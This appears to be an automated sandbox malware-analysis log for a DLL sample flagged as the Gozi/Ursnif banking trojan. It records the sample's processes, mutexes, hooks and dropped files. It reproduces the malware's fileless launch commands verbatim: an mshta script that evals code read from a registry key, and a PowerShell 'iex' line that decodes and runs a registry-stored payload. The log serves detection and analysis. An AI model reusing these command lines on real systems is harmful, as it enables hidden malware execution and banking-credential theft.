Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00C9D0DC	1_2_00C9D0DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CA48AD	1_2_00CA48AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CAD057	1_2_00CAD057
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CB7188	1_2_00CB7188
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00C962FA	1_2_00C962FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CA8BF3	1_2_00CA8BF3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00C9E384	1_2_00C9E384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00C94C03	1_2_00C94C03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CAED4B	1_2_00CAED4B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CB3EAF	1_2_00CB3EAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CAD7BD	1_2_00CAD7BD

Source: lojdfmf3.dll.36.dr	Static PE information: No import functions for PE file found
Source: cuuygyc1.dll.35.dr	Static PE information: No import functions for PE file found
Source: 4puomjgc.dll.39.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: u8xtCk7fq8.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html

Source: classification engine

Classification label: mal100.bank.troj.evad.winDLL@39/68@13/2

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_009BA7B1 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,

0_2_009BA7B1

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{1B3B83AA-6D5C-11EB-90E5-ECF4BB2D2496}.dat

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{160F585B-7D7B-B806-B7AA-016CDB7EC560}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{B2482645-6990-B41E-8306-AD28679A31DC}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4712:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_01
Source: C:\Windows\System32\loaddll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{9608A54E-FD26-38BC-372A-81EC5BFE45E0}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{5E77434C-2577-40BE-9F72-297443C66DE8}

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF94A0433F3C84B120.TMP

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll',#1

Source: u8xtCk7fq8.dll

Virustotal: Detection: 33%

Source: loaddll32.exe	String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: rundll32.exe	String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll',#1
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3728 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17414 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17426 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17428 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17440 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3102.tmp' 'c:\Users\user\AppData\Local\Temp\cuuygyc1\CSCC66BFCF5E1994D52B7125888E8D0949B.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3577.tmp' 'c:\Users\user\AppData\Local\Temp\lojdfmf3\CSC1A2D97838D3A497FBCCAE884ABC3AAE9.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3728 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17414 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17426 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17428 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17440 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3102.tmp' 'c:\Users\user\AppData\Local\Temp\cuuygyc1\CSCC66BFCF5E1994D52B7125888E8D0949B.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3577.tmp' 'c:\Users\user\AppData\Local\Temp\lojdfmf3\CSC1A2D97838D3A497FBCCAE884ABC3AAE9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: unknown unknown

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000023.00000002.586036318.0000023E99060000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.590796199.000002D199FF0000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.596196154.00000000062A0000.00000004.00000001.sdmp, rundll32.exe, 00000001.00000003.615896828.0000000007DF0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.596196154.00000000062A0000.00000004.00000001.sdmp, rundll32.exe, 00000001.00000003.615896828.0000000007DF0000.00000004.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline'

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_009B5BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_009B5BD5

Source: u8xtCk7fq8.dll	Static PE information: section name: .code
Source: u8xtCk7fq8.dll	Static PE information: section name: .rdatat
Source: u8xtCk7fq8.dll	Static PE information: section name: .NewIT

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_029544C0 push ebp; mov dword ptr [esp], FFFF0000h	0_2_029544C8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_029544C0 push ebp; mov dword ptr [esp], 00000220h	0_2_029544D5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_029511F3 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx	0_2_0295120F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_029511F3 push dword ptr [ebp-10h]; mov dword ptr [esp], edi	0_2_02951215
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_029511F3 push esi; mov dword ptr [esp], 00000003h	0_2_02951260
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_029511F3 push edx; mov dword ptr [esp], 00F00000h	0_2_02951269
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009D7177 push ecx; ret	0_2_009D7187
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009D6E10 push ecx; ret	0_2_009D6E19
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_044044C0 push ebp; mov dword ptr [esp], FFFF0000h	1_2_044044C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_044044C0 push ebp; mov dword ptr [esp], 00000220h	1_2_044044D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_044011F3 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx	1_2_0440120F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_044011F3 push dword ptr [ebp-10h]; mov dword ptr [esp], edi	1_2_04401215
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_044011F3 push esi; mov dword ptr [esp], 00000003h	1_2_04401260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_044011F3 push edx; mov dword ptr [esp], 00F00000h	1_2_04401269
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CB7177 push ecx; ret	1_2_00CB7187
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CB1246 push cs; retf	1_2_00CB124B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CB125E push cs; retf	1_2_00CB125F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CB127E push cs; retf	1_2_00CB127F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CB6E10 push ecx; ret	1_2_00CB6E19

Source: initial sample

Static PE information: section name: .code entropy: 7.17681778951

Persistence and Installation Behavior:

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483299200.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.531676520.00000000054AF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483227814.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483286163.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483203935.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483151802.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437340303.00000000056AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483178397.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483270828.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.436829571.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437112820.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.593087987.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.436872189.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437218385.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437202688.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.435392429.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483251728.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6224, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6200, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
